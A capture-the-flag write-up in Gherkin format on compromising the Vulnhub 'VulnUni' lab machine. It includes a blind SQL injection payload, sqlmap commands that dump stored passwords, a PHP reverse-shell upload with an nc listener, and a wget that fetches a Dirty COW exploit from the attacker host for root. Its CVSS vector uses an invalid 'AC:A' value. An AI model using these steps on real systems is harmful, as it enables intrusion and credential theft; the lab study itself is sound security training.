## Version 1.4.1
## language: en

Feature:
  TOE:
    Vulnhub
  Location:
   http://10.0.2.8/
  CWE:
    CWE-0078: Improper Neutralization of Special Elements used in an OS Command
  Rule:
    REQ.173 Discard unsafe inputs
  Goal:
    Get the remote connection and get the flag inside of the file "flag.txt"
  Recommendation:
    Always validate file types in an input

  Background:
  Hacker's software:
    | <Software name> | <Version>     |
    | Virtual Box     | 6.1           |
    | Kali Linux      | 2020.3        |
    | Firefox         | 68.10.0esr    |
    | arp-scan        | 1.9.7         |
    | nmap            | 7.80          |
    | Burp Suite      | 2020.6        |
    | sqlmap          | 1.4.7         |
    | netcat          | v1.10-41.1+b1 |
    | python          | 2.7.18        |
  TOE information:
    Given a file "vulnuni1.0.1.ova"
    When I import it on Virtual Box
    When I run it on Virtual Box
    Then I realize that the user is required to log in to the system
    And I turn off the virtual machine
    And I configure the network of this VM and of other VM with Kali
    Then I turn on the Kali VM and the Vulnuni VM
    And I proceed to look for the IPs of the networks with arp-scan
    And this can be seen in [evidence](img1.png)
    And I discover the IP of the Vulnuni VM for this case is
    """
    10.0.2.8
    """
    Then I scan with nmap the open ports of Vulnuni VM
    And I can see 1 open ports
    And this can be seen in [evidence](img2.png)

  Scenario: Normal use case
    Given the open port of HTTP
    When I search "http://10.0.2.8/"
    Then I access to a web page
    And this can be seen in [evidence](img3.png)

  Scenario: Static detection
    Given I access to http://10.0.2.8/courses.html
    When I open the source code from the browser
    Then I can see commented a route from an old version of the website
    And this can be seen in [evidence](img4.png)
    But I can't detect a vulnerability from source code

  Scenario: Dynamic detection
    Given I access to http://10.0.2.8/vulnuni-eclass-platform.html
    When I click on "Login"
    Then I access to http://10.0.2.8/vulnuni-eclass/
    And I can see a login page
    And this can be seen in [evidence](img5.png)
    And I try to log in with "admin" in username and password
    And I get a DNS error to access to http://vulnuni.local/vulnuni-eclass/
    Then I open the source code of the page from the browser inspector
    And I can see that form tag uses the POST with the action attribute
    """
    http://vulnuni.local/vulnuni-eclass/
    """
    And I change that action attribute to
    """
    http://10.0.2.8/vulnuni-eclass/
    """
    And this can be seen in [evidence](img6.png)
    And I try to log in with "admin" in username and password again
    And the website working
    And the website shows me an authentication error in less than a second
    And this can be seen in [evidence](img7.png)
    Then I try to log in with password "admin" and username
    """
    admin' AND (SELECT 7505 FROM (SELECT(SLEEP(5)))ocVH) AND '1'='1
    """
    And I can notice that the website takes more than a second to respond
    Then I conclude that this login page has blind SQLi vulnerability

  Scenario: Exploitation
    Given http://10.0.2.8/vulnuni-eclass/
    When I open the source code of the page from the browser inspector
    Then I can see that form tag uses the POST with the action attribute
    """
    http://vulnuni.local/vulnuni-eclass/
    """
    And knowing that "vulnuni.local" is equal to "10.0.2.8"
    Then I run "nano /etc/hosts" to edit this file "hosts"
    And I make "vulnuni.local" redirect to "10.0.2.8" locally
    And this can be seen in [evidence](img8.png)
    And I run "service networking restart" for the changes to be taken
    Then I can access to http://vulnuni.local/vulnuni-eclass/
    And I configure the proxy Burp Suite in Firefox
    And I try to log in with "admin" in username and password
    And I catch the HTTP packet from the request with Burp Site
    Then I right click and left click on "copy to file"
    And this can be seen in [evidence](img9.png)
    And I save like a file "eclasslogin"
    Then I try to exploit the blind SQLi with SQLMap running
    """
    sqlmap -r eclasslogin -dbs
    """
    And I get the list of available databases used by the website
    And this can be seen in [evidence](img10.png)
    Then I try to dump some passwords from "eclass" database running
    """
    sqlmap -r eclasslogin -v -D eclass -T user -C password -dump
    """
    And I get a list of password from "user" table
    And this can be seen in [evidence](img11.png)
    And I try to use these passwords against the username "admin"
    And I discover that "ilikecats89" is the correct password
    Then I get access to http://vulnuni.local/vulnuni-eclass/
    When I log in with username "admin" and password "ilikecats89"
    Then I get access and I explore admin's options
    And I discover that I can upload a file zip in
    """
    http://vulnuni.local/vulnuni-eclass/modules/course_info/restore_course.php
    """
    And execute it in
    """
    http://vulnuni.local/vulnuni-eclass/courses/tmpUnzipping/{myFileName}
    """
    Then I try to use a PHP reverse shell in the website server
    And I download the file "shell.php" from http://shorturl.at/ejDO6
    And I change the variable "$ip" to my IP from my Kali VM in "shell.php"
    And I change the variable "$port" to the port that I will open with netcat
    And this can be seen in [evidence](img12.png)
    Then I compress the file "shell.php" to "shell.zip"
    And this can be seen in [evidence](img13.png)
    And I upload file "shell.zip" in
    """
    http://vulnuni.local/vulnuni-eclass/modules/course_info/restore_course.php
    """
    Then I run "nc -nvlp 443" to I connect with the PHP reverse shell
    And I execute the PHP reverse shell with
    """
    http://vulnuni.local/vulnuni-eclass/courses/tmpUnzipping/shell.php
    """
    And I get a reverse shell from Vulnuni VM on Kali VM
    And I upgrade this shell to shell TTY running
    """
    python -c 'import pty; pty.spawn("/bin/bash")'
    """
    And this can be seen in [evidence](img14.png)
    Then I navigate through many directories
    And I found a file "flag.txt" in "/home/vulnuni"
    And I run "cat flag.txt"
    And I get the supposed flag
    And this can be seen in [evidence](img15.png)
    But I think that I must first get root privileges to get the real flag
    Then I run "whoami" on the reverse shell
    Then I conclude that I haven't root privileges
    And I download the file "dirty.c" from shorturl.at/npxB8
    And I run "python -m SimpleHTTPServer 4444" on Kali VM
    Then I run "cd /tmp" to change to directory writeble on the reverse shell
    And I run "wget 10.0.2.15:4444/dirty.c" on the reverse shell
    And I get script inside of Vulnuni VM
    And this can be seen in [evidence](img16.png)
    And I run "gcc dirty.c -o dirty -pthread" to compile the script
    Then I run "./dirty" to execute the script
    And I get root privileges
    Then I navigate through many directories
    And I found a file "flag.txt" in "/root"
    And I run "cat flag.txt"
    And I get the flag
    And this can be seen in [evidence](img17.png)

  Scenario: Remediation
    When I make that the website validates the file types for a file input
    And I restrict direct access to these files from the website
    Then I avoid many vulnerabilities that could be attack vectors

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    9.0/10 (Critical) - AV:N/AC:A/PR:N/UI:N/S:C/C:H/I:H/A:H/
  Temporal: Attributes that measure the exploit's popularity and fixability
    8.6/10 (High) - E:H/RL:O/RC:C/
  Environmental: Unique and relevant attributes to a specific user environment
    8.6/10 (High) - CR:H/IR:H/AR:H/MC:H/MI:H/MA:H/

  Scenario: Correlations
    No correlations have been found to this date 2021-04-05
